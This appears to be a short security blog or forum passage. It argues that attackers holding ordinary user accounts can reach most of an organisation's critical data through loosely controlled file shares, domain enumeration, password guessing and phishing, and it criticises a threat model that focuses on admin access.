So, if an attacker is interested in stealing financial information for a company and they have access to the finance department's file share, do they really need any more access? Better yet, they probably have access to the "sales" and the "research" file shares as well because of poor access control on the file server. So at this point, if an attacker can gain all the information they need without raising the threat level of the defense, why should they?

What sorts of things can a "user level" account do? They can query the domain for pretty much all the information contained, such as machine names, user names, groups, group membership, etc. What can be done with all of that info? If an attacker had a list of all the user names, they could launch a password-guessing attack against everybody in the domain. Or, perhaps they could send a phishing email to everybody in the "sales" group trying to gain more access. At that point it's really a "choose your own adventure" type of setup.

This is the flaw in the threat model presented. An attacker can usually get at most, if not all, of the critical data of an organization by compromising user accounts. Remember folks, this is the real world, not CCDC.
